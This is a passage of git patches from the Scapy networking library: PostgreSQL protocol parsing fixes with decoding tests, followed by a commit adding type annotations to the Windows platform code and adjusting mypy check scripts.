length_of="notice_fields", fmt="I", adjust=lambda pkt, x: x + 5 ), FieldListField( "notice_fields", @@ -572,8 +587,7 @@ class NegotiateProtocolVersion(_ZeroPadding): fields_desc = [ ByteTagField(b"v"), FieldLenField( - "len", None, fmt="I", length_of="option", - adjust=lambda pkt, x: x + 12 + "len", None, fmt="I", length_of="option", adjust=lambda pkt, x: x + 12 ), SignedIntField("min_minor_version", 0), SignedIntField("unrecognized_options", 0), @@ -586,8 +600,7 @@ class FunctionCallResponse(_ZeroPadding): fields_desc = [ ByteTagField(b"V"), FieldLenField( - "len", None, fmt="I", length_of="result", - adjust=lambda pkt, x: x + 8 + "len", None, fmt="I", length_of="result", adjust=lambda pkt, x: x + 8 ), FieldLenField("result_len", None, length_of="result"), StrLenField("result", None, length_from=lambda pkt: pkt.result_len), @@ -599,8 +612,7 @@ class ParameterDescription(_ZeroPadding): fields_desc = [ ByteTagField(b"t"), FieldLenField( - "len", None, fmt="I", length_of="dtypes", - adjust=lambda pkt, x: x + 6 + "len", None, fmt="I", length_of="dtypes", adjust=lambda pkt, x: x + 6 ), SignedShortField("dtypes_len", 0), FieldListField( @@ -617,8 +629,7 @@ class CopyData(_ZeroPadding): fields_desc = [ ByteTagField(b"d"), FieldLenField( - "len", None, fmt="I", length_of="data", - adjust=lambda pkt, x: x + 4 + "len", None, fmt="I", length_of="data", adjust=lambda pkt, x: x + 4 ), StrLenField("data", None, length_from=lambda pkt: pkt.len - 4), ] @@ -637,8 +648,7 @@ class CopyFail(_ZeroPadding): fields_desc = [ ByteTagField(b"f"), FieldLenField( - "len", None, fmt="I", length_of="reason", - adjust=lambda pkt, x: x + 4 + "len", None, fmt="I", length_of="reason", adjust=lambda pkt, x: x + 4 ), StrLenField("reason", None, length_from=lambda pkt: pkt.len - 4), ] @@ -717,7 +727,7 @@ class CopyBothResponse(_ZeroPadding): FRONTEND_TAG_TO_PACKET_CLS = { - # b'B' : 'Bind', # TODO + b"B": Bind, b"C": Close, b"d": CopyData, b"c": CopyDone, @@ -725,7 +735,7 @@ class CopyBothResponse(_ZeroPadding): b"D": Describe, b"E": Execute, b"H": Flush, - # b'F': 'FunctionCall', # TODO + b"F": _Todo, b"P": Parse, b"p": PasswordMessage, b"Q": Query, @@ -764,10 +774,22 @@ class CopyBothResponse(_ZeroPadding): class PostgresFrontend(_BasePostgres): cls_mapping = FRONTEND_TAG_TO_PACKET_CLS + @classmethod + def tcp_reassemble(cls, data, metadata): + msgs = PostgresFrontend(data) + if msgs.contents and "Sync" in msgs.contents[-1]: + return msgs + class PostgresBackend(_BasePostgres): cls_mapping = BACKEND_TAG_TO_PACKET_CLS + @classmethod + def tcp_reassemble(cls, data, metadata): + msgs = PostgresBackend(data) + if msgs.contents and "ReadyForQuery" in msgs.contents[-1]: + return msgs + bind_layers(TCP, PostgresFrontend, dport=5432) bind_layers(TCP, PostgresBackend, sport=5432) diff --git a/test/contrib/postgres.uts b/test/contrib/postgres.uts index 68701459fb9..f6e0aae55f7 100644 --- a/test/contrib/postgres.uts +++ b/test/contrib/postgres.uts @@ -238,3 +238,70 @@ assert copydata_out.contents[6].data == b'6\tPip\t66\t6\n' assert isinstance(copydata_out.contents[7], CopyDone) assert isinstance(copydata_out.contents[8], CommandComplete) assert isinstance(copydata_out.contents[9], ReadyForQuery) + += Check example request packet + +request = PostgresFrontend( + b"\x50\x00\x00\x00\x64\x00\x53\x45\x4c\x45\x43\x54\x20\x44\x5f\x4e" + b"\x45\x58\x54\x5f\x4f\x5f\x49\x44\x2c\x20\x44\x5f\x54\x41\x58\x20" + b"\x20\x20\x46\x52\x4f\x4d\x20\x64\x69\x73\x74\x72\x69\x63\x74\x20" + b"\x57\x48\x45\x52\x45\x20\x44\x5f\x57\x5f\x49\x44\x20\x3d\x20\x24" + b"\x31\x20\x41\x4e\x44\x20\x44\x5f\x49\x44\x20\x3d\x20\x24\x32\x20" + b"\x46\x4f\x52\x20\x55\x50\x44\x41\x54\x45\x00\x00\x02\x00\x00\x00" + b"\x17\x00\x00\x00\x17\x42\x00\x00\x00\x20\x00\x00\x00\x02\x00\x01" + b"\x00\x01\x00\x02\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x04" + b"\x00\x00\x00\x0a\x00\x00\x44\x00\x00\x00\x06\x50\x00\x45\x00\x00" + b"\x00\x09\x00\x00\x00\x00\x00\x53\x00\x00\x00\x04" +) + +assert len(request.contents) == 5 +assert isinstance(request.contents[0], Parse) +assert isinstance(request.contents[1], Bind) +assert isinstance(request.contents[2], Describe) +assert isinstance(request.contents[3], Execute) +assert isinstance(request.contents[4], Sync) + += Check parse decoding + +parse_msg = request.contents[0] +assert parse_msg.len == 100 +assert parse_msg.destination == b"" +assert parse_msg.query == b"SELECT D_NEXT_O_ID, D_TAX FROM district WHERE D_W_ID = $1 AND D_ID = $2 FOR UPDATE" +assert parse_msg.num_param_dtypes == 2 +assert parse_msg.params[0] == 23 +assert parse_msg.params[1] == 23 + += Check bind decoding + +bind_msg = request.contents[1] +assert bind_msg.len == 32 +assert bind_msg.destination == b"" +assert bind_msg.statement == b"" +assert bind_msg.codes_count == 2 +assert bind_msg.codes[0] == 1 +assert bind_msg.codes[1] == 1 +assert bind_msg.values_count == 2 +assert bind_msg.values[0].len == 4 +assert bind_msg.values[0].data == b"\x00\x00\x00\x14" +assert bind_msg.values[1].len == 4 +assert bind_msg.values[1].data == b"\x00\x00\x00\x0a" +assert bind_msg.results_count == 0 + += Check describe decoding + +describe_msg = request.contents[2] +assert describe_msg.len == 6 +assert describe_msg.close_type == b"P" +assert describe_msg.statement == b"" + += Check execute decoding + +exec_msg = request.contents[3] +assert exec_msg.len == 9 +assert exec_msg.portal == b"" +assert exec_msg.rows == 0 + += Check sync decoding + +sync_msg = request.contents[4] +assert sync_msg.len == 4 From a2b7a28faff1db058dd22ce097a268e0ad5d1d33 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Aug 2022 10:41:42 +0200 Subject: [PATCH 0874/1632] [Hinty] Core typing: windows (#3684) * Core typing: windows Co-authored-by: Pierre --- .config/mypy/mypy.ini | 3 + .config/mypy/mypy_check.py | 37 ++++- .config/mypy/mypy_deployment_stats.py | 13 +- .config/mypy/mypy_enabled.txt | 3 + scapy/arch/__init__.py | 17 ++- scapy/arch/bpf/core.py | 4 +- scapy/arch/common.py | 45 +----- scapy/arch/libpcap.py | 39 ++--- scapy/arch/linux.py | 3 +- scapy/arch/solaris.py | 7 +- scapy/arch/unix.py | 41 ++++++ scapy/arch/windows/__init__.py | 196 ++++++++++++++++++++------ scapy/arch/windows/native.py | 48 +++++-- scapy/arch/windows/structures.py | 39 +++-- scapy/automaton.py | 13 +- scapy/base_classes.py | 6 +- scapy/compat.py | 1 + scapy/config.py | 20 ++- scapy/layers/inet6.py | 17 ++- scapy/pipetool.py | 8 +- scapy/supersocket.py | 173 ++++++++++++----------- scapy/utils.py | 4 +- tox.ini | 3 +- 23 files changed, 484 insertions(+), 256 deletions(-) diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index 6779f9071f4..6a04ecd04eb 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -8,6 +8,9 @@ ignore_missing_imports = True # Layers specific config +[mypy-scapy.arch.*] +implicit_reexport = True + [mypy-scapy.layers.*,scapy.contrib.*] warn_return_any = False diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 7b69a2ee3c7..58d878df8d6 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -22,6 +22,16 @@ from mypy.main import main as mypy_main +# Check platform arg + +PLATFORM = None + +if len(sys.argv) >= 2: + if len(sys.argv) > 2: + print("Usage: mypy_check.py [platform]") + sys.exit(1) + PLATFORM = sys.argv[1] + # Load files localdir = os.path.split(__file__)[0] @@ -31,7 +41,7 @@ if not FILES: print("No files specified. Arborting") - sys.exit(0) + sys.exit(1) # Generate mypy arguments @@ -60,9 +70,11 @@ ) ), "--show-traceback", -] + [os.path.abspath(f) for f in FILES] +] + ([ + "--platform=" + PLATFORM +] if PLATFORM else []) -if sys.platform.startswith("linux"): +if PLATFORM.startswith("linux"): ARGS.extend([ "--always-true=LINUX", "--always-false=OPENBSD", @@ -72,7 +84,8 @@ "--always-false=WINDOWS", "--always-false=BSD", ]) -if sys.platform.startswith("win32"): + FILES = [x for x in FILES if not x.startswith("scapy/arch/windows")] +elif PLATFORM.startswith("win32"): ARGS.extend([ "--always-false=LINUX", "--always-false=OPENBSD", @@ -83,7 +96,23 @@ "--always-false=WINDOWS_XP", "--always-false=BSD", ]) + FILES = [ + x for x in FILES if ( + x not in { + # Disabled on Windows + "scapy/arch/linux.py", + "scapy/arch/solaris.py", + "scapy/contrib/cansocket_native.py", + "scapy/contrib/isotp/isotp_native_socket.py", + } + ) and not x.startswith("scapy/arch/bpf") + ] +else: + raise ValueError("Unknown platform") # Run mypy over the files +ARGS += [ + os.path.abspath(f) for f in FILES +] mypy_main(None, sys.stdout, sys.stderr, ARGS) diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py index 737bef71f3b..4f54433237f 100644 --- a/.config/mypy/mypy_deployment_stats.py +++ b/.config/mypy/mypy_deployment_stats.py @@ -30,7 +30,7 @@ # Process REMAINING = defaultdict(list) -MODULES = defaultdict(lambda: (0, 0)) +MODULES = defaultdict(lambda: (0, 0, 0, 0)) for f in ALL_FILES: with open(os.path.join(rootpath, f)) as fd: @@ -40,21 +40,24 @@ mod = parts[1] else: mod = "[core]" - e, l = MODULES[mod] + e, l, t, a = MODULES[mod] if f in FILES: e += lines + t += 1 else: REMAINING[mod].append(f) l += lines - MODULES[mod] = (e, l) + a += 1 + MODULES[mod] = (e, l, t, a) ENABLED = sum(x[0] for x in MODULES.values()) TOTAL = sum(x[1] for x in MODULES.values()) -print("*The numbers correspond to the amount of lines per files processed*") print("**MyPy Support: %.2f%%**" % (ENABLED / TOTAL * 100)) +print("| Module | Typed code (lines) | Typed files |") +print("| --- | --- | --- |") for mod, dat in MODULES.items(): - print("- `%s`: %.2f%%" % (mod, dat[0] / dat[1] * 100)) + print("|`%s` | %.2f%% | %s/%s |" % (mod, dat[0] / dat[1] * 100, dat[2], dat[3])) print() COREMODS = REMAINING["[core]"] diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 8ef430f0136..42f1c6db7b8 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -15,6 +15,9 @@ scapy/arch/libpcap.py scapy/arch/linux.py scapy/arch/unix.py scapy/arch/solaris.py +scapy/arch/windows/__init__.py +scapy/arch/windows/native.py +scapy/arch/windows/structures.py scapy/as_resolvers.py scapy/asn1/__init__.py scapy/asn1/asn1.py diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index eda7ea4d948..297cfea0cef 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -7,8 +7,8 @@ Operating system specific functionality. """ -from __future__ import absolute_import import socket +import sys from scapy.compat import orb from scapy.config import conf, _set_conf_sockets @@ -20,7 +20,7 @@ ARPHDR_TUN, IPV6_ADDR_GLOBAL ) -from scapy.error import Scapy_Exception +from scapy.error import log_loading, Scapy_Exception from scapy.interfaces import NetworkInterface, network_name from scapy.pton_ntop import inet_pton, inet_ntop @@ -46,6 +46,7 @@ "in6_getifaddr", "read_routes", "read_routes6", + "SIOCGIFHWADDR", ] # BACKWARD COMPATIBILITY @@ -60,7 +61,7 @@ def str2mac(s): # Duplicated from scapy/utils.py for import reasons - # type: (str) -> str + # type: (bytes) -> str return ("%02x:" * 6)[:-1] % tuple(orb(x) for x in s) @@ -77,7 +78,8 @@ def get_if_hwaddr(iff): """ Returns the MAC (hardware) address of an interface """ - addrfamily, mac = get_if_raw_hwaddr(iff) # type: ignore # noqa: F405 + from scapy.arch import get_if_raw_hwaddr + addrfamily, mac = get_if_raw_hwaddr(iff) # noqa: F405 if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_PPP, ARPHDR_TUN]: return str2mac(mac) else: @@ -130,11 +132,18 @@ def get_if_raw_addr6(iff): # Native from scapy.arch.bpf.supersocket import * # noqa F403 conf.use_bpf = True + SIOCGIFHWADDR = 0 # mypy compat elif SOLARIS: from scapy.arch.solaris import * # noqa F403 elif WINDOWS: from scapy.arch.windows import * # noqa F403 from scapy.arch.windows.native import * # noqa F403 + SIOCGIFHWADDR = 0 # mypy compat +else: + log_loading.critical( + "Scapy currently does not support %s! I/O will NOT work!" % sys.platform + ) + SIOCGIFHWADDR = 0 # mypy compat if LINUX or BSD: conf.load_layers.append("tuntap") diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index bc41800daa3..ff0810f7eef 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -21,8 +21,8 @@ import scapy from scapy.arch.bpf.consts import BIOCSETF, SIOCGIFFLAGS, BIOCSETIF -from scapy.arch.common import get_if, compile_filter, _iff_flags -from scapy.arch.unix import in6_getifaddr +from scapy.arch.common import compile_filter, _iff_flags +from scapy.arch.unix import get_if, in6_getifaddr from scapy.compat import plain_str from scapy.config import conf from scapy.consts import LINUX diff --git a/scapy/arch/common.py b/scapy/arch/common.py index ad4d24138c9..ce354096fea 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -8,26 +8,19 @@ """ import ctypes -import socket -import struct -from scapy.consts import WINDOWS from scapy.config import conf from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT from scapy.error import Scapy_Exception -from scapy.interfaces import network_name, NetworkInterface +from scapy.interfaces import network_name from scapy.libs.structures import bpf_program # Type imports import scapy from scapy.compat import ( Optional, - Tuple, Union, ) -if not WINDOWS: - from fcntl import ioctl - # From if.h _iff_flags = [ "UP", @@ -52,41 +45,6 @@ "ECHO" ] -# UTILS - - -def get_if(iff, cmd): - # type: (Union[NetworkInterface, str], int) -> bytes - """Ease SIOCGIF* ioctl calls""" - - iff = network_name(iff) - sck = socket.socket() - try: - return ioctl(sck, cmd, struct.pack("16s16x", iff.encode("utf8"))) - finally: - sck.close() - - -def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] - siocgifhwaddr=None, # type: Optional[int] - ): - # type: (...) -> Tuple[int, bytes] - """Get the raw MAC address of a local interface. - - This function uses SIOCGIFHWADDR calls, therefore only works - on some distros. - - :param iff: the network interface name as a string - :returns: the corresponding raw MAC address - """ - if siocgifhwaddr is None: - from scapy.arch import SIOCGIFHWADDR # type: ignore - siocgifhwaddr = SIOCGIFHWADDR - return struct.unpack( # type: ignore - "16xH6s8x", - get_if(iff, siocgifhwaddr) - ) - # BPF HANDLERS @@ -127,6 +85,7 @@ def compile_filter(filter_exp, # type: str ) iface = conf.iface # Try to guess linktype to avoid requiring root + from scapy.arch import get_if_raw_hwaddr try: arphd = get_if_raw_hwaddr(iface)[0] linktype = ARPHRD_TO_DLT.get(arphd) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 8fa51351641..ba8dcdcb52e 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -38,6 +38,7 @@ import scapy.consts from scapy.compat import ( + cast, Dict, List, NoReturn, @@ -140,7 +141,7 @@ def close(self): from scapy.libs.winpcapy import pcap_setmintocopy, pcap_getevent else: from scapy.libs.winpcapy import pcap_get_selectable_fd - from ctypes import POINTER, byref, create_string_buffer, c_ubyte, cast + from ctypes import POINTER, byref, create_string_buffer, c_ubyte, cast as ccast # Part of the Winpcapy integration was inspired by phaethon/scapy # but he destroyed the commit history, so there is no link to that @@ -201,10 +202,10 @@ def load_winpcapy(): family = a.contents.addr.contents.sa_family ap = a.contents.addr if family == socket.AF_INET: - val = cast(ap, POINTER(sockaddr_in)) + val = ccast(ap, POINTER(sockaddr_in)) addr_raw = val.contents.sin_addr[:] elif family == socket.AF_INET6: - val = cast(ap, POINTER(sockaddr_in6)) + val = ccast(ap, POINTER(sockaddr_in6)) addr_raw = val.contents.sin6_addr[:] elif family == socket.AF_LINK: # Special case: MAC @@ -258,6 +259,8 @@ def load_winpcapy(): conf.use_npcap = True conf.loopback_name = conf.loopback_name = "Npcap Loopback Adapter" # noqa: E501 +if WINDOWS: + NPCAP_PATH = "" if conf.use_pcap: class _PcapWrapper_libpcap: # noqa: F811 """Wrapper for the libpcap calls""" @@ -340,10 +343,10 @@ def datalink(self): def fileno(self): # type: () -> int if WINDOWS: - return pcap_getevent(self.pcap) + return cast(int, pcap_getevent(self.pcap)) else: # This does not exist under Windows - return pcap_get_selectable_fd(self.pcap) # type: ignore + return cast(int, pcap_get_selectable_fd(self.pcap)) def setfilter(self, f): # type: (str) -> bool @@ -445,11 +448,12 @@ def __init__(self, ) super(L2pcapListenSocket, self).__init__(fd) try: - ioctl( - self.pcap_fd.fileno(), - BIOCIMMEDIATE, - struct.pack("I", 1) - ) + if not WINDOWS: + ioctl( + self.pcap_fd.fileno(), + BIOCIMMEDIATE, + struct.pack("I", 1) + ) except Exception: pass if type == ETH_P_ALL: # Do not apply any filter if Ethernet type is given # noqa: E501 @@ -490,11 +494,12 @@ def __init__(self, monitor=monitor) super(L2pcapSocket, self).__init__(fd) try: - ioctl( - self.pcap_fd.fileno(), - BIOCIMMEDIATE, - struct.pack("I", 1) - ) + if not WINDOWS: + ioctl( + self.pcap_fd.fileno(), + BIOCIMMEDIATE, + struct.pack("I", 1) + ) except Exception: pass if nofilter: @@ -548,7 +553,3 @@ def send(self, x): except AttributeError: pass return self.pcap_fd.send(sx) -else: - # No libpcap installed - if WINDOWS: - NPCAP_PATH = "" diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 8474cde0406..9087156c09f 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -29,9 +29,8 @@ from scapy.arch.common import ( _iff_flags, compile_filter, - get_if, - get_if_raw_hwaddr, ) +from scapy.arch.unix import get_if, get_if_raw_hwaddr from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index 1b23c863f63..dd6b22cfcd5 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -20,11 +20,12 @@ from scapy.arch.libpcap import * # noqa: F401, F403, E402 from scapy.arch.unix import * # noqa: F401, F403, E402 -from scapy.arch.common import get_if_raw_hwaddr # noqa: F401, F403, E402 + +from scapy.interfaces import NetworkInterface # noqa: E402 def get_working_if(): - # type: () -> str + # type: () -> NetworkInterface """Return an interface that works""" try: # return the interface associated with the route with smallest @@ -33,4 +34,4 @@ def get_working_if(): except ValueError: # no route iface = conf.loopback_name - return iface + return conf.ifaces.dev_from_name(iface) diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 713a7cb708c..acd52c8f562 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -9,12 +9,15 @@ import os import socket +import struct +from fcntl import ioctl import scapy.config import scapy.utils from scapy.config import conf from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS from scapy.error import log_runtime, warning +from scapy.interfaces import network_name, NetworkInterface from scapy.pton_ntop import inet_pton from scapy.utils6 import in6_getscope, construct_source_candidate_set from scapy.utils6 import in6_isvalid, in6_ismlladdr, in6_ismnladdr @@ -25,9 +28,47 @@ Optional, Tuple, Union, + cast, ) +def get_if(iff, cmd): + # type: (Union[NetworkInterface, str], int) -> bytes + """Ease SIOCGIF* ioctl calls""" + + iff = network_name(iff) + sck = socket.socket() + try: + return ioctl(sck, cmd, struct.pack("16s16x", iff.encode("utf8"))) + finally: + sck.close() + + +def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] + siocgifhwaddr=None, # type: Optional[int] + ): + # type: (...) -> Tuple[int, bytes] + """Get the raw MAC address of a local interface. + + This function uses SIOCGIFHWADDR calls, therefore only works + on some distros. + + :param iff: the network interface name as a string + :returns: the corresponding raw MAC address + """ + + if siocgifhwaddr is None: + from scapy.arch import SIOCGIFHWADDR + siocgifhwaddr = SIOCGIFHWADDR + return cast( + "Tuple[int, bytes]", + struct.unpack( + "16xH6s8x", + get_if(iff, siocgifhwaddr) + ) + ) + + ################## # Routes stuff # ################## diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 9d0b057d52a..df8af008d31 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -7,14 +7,13 @@ Customizations needed to support Microsoft Windows. """ -from __future__ import absolute_import -from __future__ import print_function +from glob import glob import os import platform as platform_lib import socket -import subprocess as sp -from glob import glob import struct +import subprocess as sp + import warnings from scapy.arch.windows.structures import _windows_title, \ @@ -40,6 +39,19 @@ from scapy.compat import plain_str from scapy.supersocket import SuperSocket +# Typing imports +from scapy.compat import ( + cast, + overload, + Any, + Dict, + List, + Literal, + Optional, + Tuple, + Union, +) + conf.use_pcap = True # These import must appear after setting conf.use_* variables @@ -66,14 +78,14 @@ if not hasattr(socket, 'IPPROTO_IPIP'): socket.IPPROTO_IPIP = 4 if not hasattr(socket, 'IP_RECVTTL'): - socket.IP_RECVTTL = 12 + socket.IP_RECVTTL = 12 # type: ignore if not hasattr(socket, 'IPV6_HDRINCL'): - socket.IPV6_HDRINCL = 36 -# https://bugs.python.org/issue29515 + socket.IPV6_HDRINCL = 36 # type: ignore +# https://github.com/python/cpython/issues/73701 if not hasattr(socket, 'IPPROTO_IPV6'): - socket.SOL_IPV6 = 41 + socket.IPPROTO_IPV6 = 41 if not hasattr(socket, 'SOL_IPV6'): - socket.SOL_IPV6 = socket.IPPROTO_IPV6 + socket.SOL_IPV6 = socket.IPPROTO_IPV6 # type: ignore if not hasattr(socket, 'IPPROTO_GRE'): socket.IPPROTO_GRE = 47 if not hasattr(socket, 'IPPROTO_AH'): @@ -85,6 +97,7 @@ def _encapsulate_admin(cmd): + # type: (str) -> str """Encapsulate a command with an Administrator flag""" # To get admin access, we start a new powershell instance with admin # rights, which will execute the command. This needs to be done from a @@ -96,6 +109,7 @@ def _encapsulate_admin(cmd): def _get_npcap_config(param_key): + # type: (str) -> Optional[str] """ Get a Npcap parameter matching key in the registry. @@ -112,10 +126,11 @@ def _get_npcap_config(param_key): winreg.CloseKey(key) except WindowsError: return None - return dot11_adapters + return cast(str, dot11_adapters) def _where(filename, dirs=None, env="PATH"): + # type: (str, Optional[Any], str) -> str """Find file in current dir, in deep_lookup cache or in system path""" if dirs is None: dirs = [] @@ -134,6 +149,7 @@ def _where(filename, dirs=None, env="PATH"): def win_find_exe(filename, installsubdir=None, env="ProgramFiles"): + # type: (str, Optional[Any], str) -> str """Find executable in current dir, system path or in the given ProgramFiles subdir, and retuen its absolute path. """ @@ -148,17 +164,19 @@ def win_find_exe(filename, installsubdir=None, env="ProgramFiles"): path = None else: break - return path + return path or "" class WinProgPath(ProgPath): def __init__(self): + # type: () -> None self._reload() def _reload(self): - self.pdfreader = None - self.psreader = None - self.svgreader = None + # type: () -> None + self.pdfreader = "" + self.psreader = "" + self.svgreader = "" # We try some magic to find the appropriate executables self.dot = win_find_exe("dot") self.tcpdump = win_find_exe("windump") @@ -199,6 +217,7 @@ def _reload(self): def _exec_cmd(command): + # type: (str) -> Tuple[bytes, int] """Call a CMD command and return the output and returncode""" proc = sp.Popen(command, stdout=sp.PIPE, @@ -211,6 +230,7 @@ def _exec_cmd(command): if conf.prog.tcpdump and conf.use_npcap: def test_windump_npcap(): + # type: () -> bool """Return whether windump version is correct or not""" try: p_test_windump = sp.Popen([conf.prog.tcpdump, "-help"], stdout=sp.PIPE, stderr=sp.STDOUT) # noqa: E501 @@ -230,12 +250,14 @@ def test_windump_npcap(): def get_windows_if_list(extended=False): + # type: (bool) -> List[Dict[str, Any]] """Returns windows interfaces through GetAdaptersAddresses. params: - extended: include anycast and multicast IPv6 (default False)""" # Should work on Windows XP+ def _get_mac(x): + # type: (Dict[str, Any]) -> str size = x["physical_address_length"] if size != 6: return "" @@ -243,11 +265,13 @@ def _get_mac(x): return str2mac(bytes(data)[:size]) def _get_ips(x): + # type: (Dict[str, Any]) -> List[str] unicast = x['first_unicast_address'] anycast = x['first_anycast_address'] multicast = x['first_multicast_address'] def _resolve_ips(y): + # type: (List[Dict[str, Any]]) -> List[str] if not isinstance(y, list): return [] ips = [] @@ -293,6 +317,7 @@ def _resolve_ips(y): def _pcapname_to_guid(pcap_name): + # type: (str) -> str """Converts a Winpcap/Npcap pcpaname to its guid counterpart. e.g. \\DEVICE\\NPF_{...} => {...} """ @@ -305,14 +330,16 @@ class NetworkInterface_Win(NetworkInterface): """A network interface of your local host""" def __init__(self, provider, data=None): - self.cache_mode = None - self.ipv4_metric = None - self.ipv6_metric = None - self.guid = None - self.raw80211 = None + # type: (WindowsInterfacesProvider, Optional[Dict[str, Any]]) -> None + self.cache_mode = None # type: Optional[bool] + self.ipv4_metric = None # type: Optional[int] + self.ipv6_metric = None # type: Optional[int] + self.guid = None # type: Optional[str] + self.raw80211 = None # type: Optional[bool] super(NetworkInterface_Win, self).__init__(provider, data) def update(self, data): + # type: (Dict[str, Any]) -> None """Update info about a network interface according to a given dictionary. Such data is provided by get_windows_if_list """ @@ -336,6 +363,7 @@ def update(self, data): super(NetworkInterface_Win, self).update(data) def _check_npcap_requirement(self): + # type: () -> None if not conf.use_npcap: raise OSError("This operation requires Npcap.") if self.raw80211 is None: @@ -345,7 +373,10 @@ def _check_npcap_requirement(self): raise Scapy_Exception("Npcap 802.11 support is NOT enabled !") def _npcap_set(self, key, val): + # type: (str, str) -> bool """Internal function. Set a [key] parameter to [value]""" + if self.guid is None: + raise OSError("Interface not setup") res, code = _exec_cmd(_encapsulate_admin( " ".join([_WlanHelper, self.guid[1:-1], key, val]) )) @@ -355,6 +386,9 @@ def _npcap_set(self, key, val): return True def _npcap_get(self, key): + # type: (str) -> str + if self.guid is None: + raise OSError("Interface not setup") res, code = _exec_cmd(" ".join([_WlanHelper, self.guid[1:-1], key])) _windows_title() # Reset title of the window if code != 0: @@ -362,12 +396,14 @@ def _npcap_get(self, key): return plain_str(res.strip()) def mode(self): + # type: () -> str """Get the interface operation mode. Only available with Npcap.""" self._check_npcap_requirement() return self._npcap_get("mode") def ismonitor(self): + # type: () -> bool """Returns True if the interface is in monitor mode. Only available with Npcap.""" if self.cache_mode is not None: @@ -380,6 +416,7 @@ def ismonitor(self): return False def setmonitor(self, enable=True): + # type: (bool) -> bool """Alias for setmode('monitor') or setmode('managed') Only available with Npcap""" # We must reset the monitor cache @@ -394,6 +431,7 @@ def setmonitor(self, enable=True): return tmp if enable else (not tmp) def availablemodes(self): + # type: () -> List[str] """Get all available interface modes. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -401,6 +439,7 @@ def availablemodes(self): return self._npcap_get("modes").split(",") def setmode(self, mode): + # type: (Union[str, int]) -> bool """Set the interface mode. It can be: - 0 or managed: Managed Mode (aka "Extensible Station Mode") - 1 or monitor: Monitor Mode (aka "Network Monitor Mode") @@ -427,6 +466,7 @@ def setmode(self, mode): return self._npcap_set("mode", m) def channel(self): + # type: () -> int """Get the channel of the interface. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -434,6 +474,7 @@ def channel(self): return int(self._npcap_get("channel")) def setchannel(self, channel): + # type: (int) -> bool """Set the channel of the interface (1-14): Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -441,6 +482,7 @@ def setchannel(self, channel): return self._npcap_set("channel", str(channel)) def frequence(self): + # type: () -> int """Get the frequence of the interface. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -448,6 +490,7 @@ def frequence(self): return int(self._npcap_get("freq")) def setfrequence(self, freq): + # type: (int) -> bool """Set the channel of the interface (1-14): Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -455,6 +498,7 @@ def setfrequence(self, freq): return self._npcap_set("freq", str(freq)) def availablemodulations(self): + # type: () -> List[str] """Get all available 802.11 interface modulations. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -462,6 +506,7 @@ def availablemodulations(self): return self._npcap_get("modus").split(",") def modulation(self): + # type: () -> str """Get the 802.11 modulation of the interface. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 @@ -469,6 +514,7 @@ def modulation(self): return self._npcap_get("modu") def setmodulation(self, modu): + # type: (int) -> bool """Set the interface modulation. It can be: - 0: dsss - 1: fhss @@ -507,13 +553,15 @@ class WindowsInterfacesProvider(InterfaceProvider): libpcap = True def _is_valid(self, dev): + # type: (NetworkInterface) -> bool # Winpcap (and old Npcap) have no support for PCAP_IF_UP :( if dev.flags == 0: return True - return dev.flags & PCAP_IF_UP + return bool(dev.flags & PCAP_IF_UP) @classmethod def _pcap_check(cls): + # type: () -> None """Performs checks/restart pcap adapter""" if not conf.use_pcap: # Winpcap/Npcap isn't installed @@ -522,13 +570,14 @@ def _pcap_check(cls): _detect = pcap_service_status() def _ask_user(): + # type: () -> bool if not conf.interactive: return False msg = "Do you want to start it ? (yes/no) [y]: " try: # Better IPython compatibility import IPython - return IPython.utils.io.ask_yes_no(msg, default='y') + return 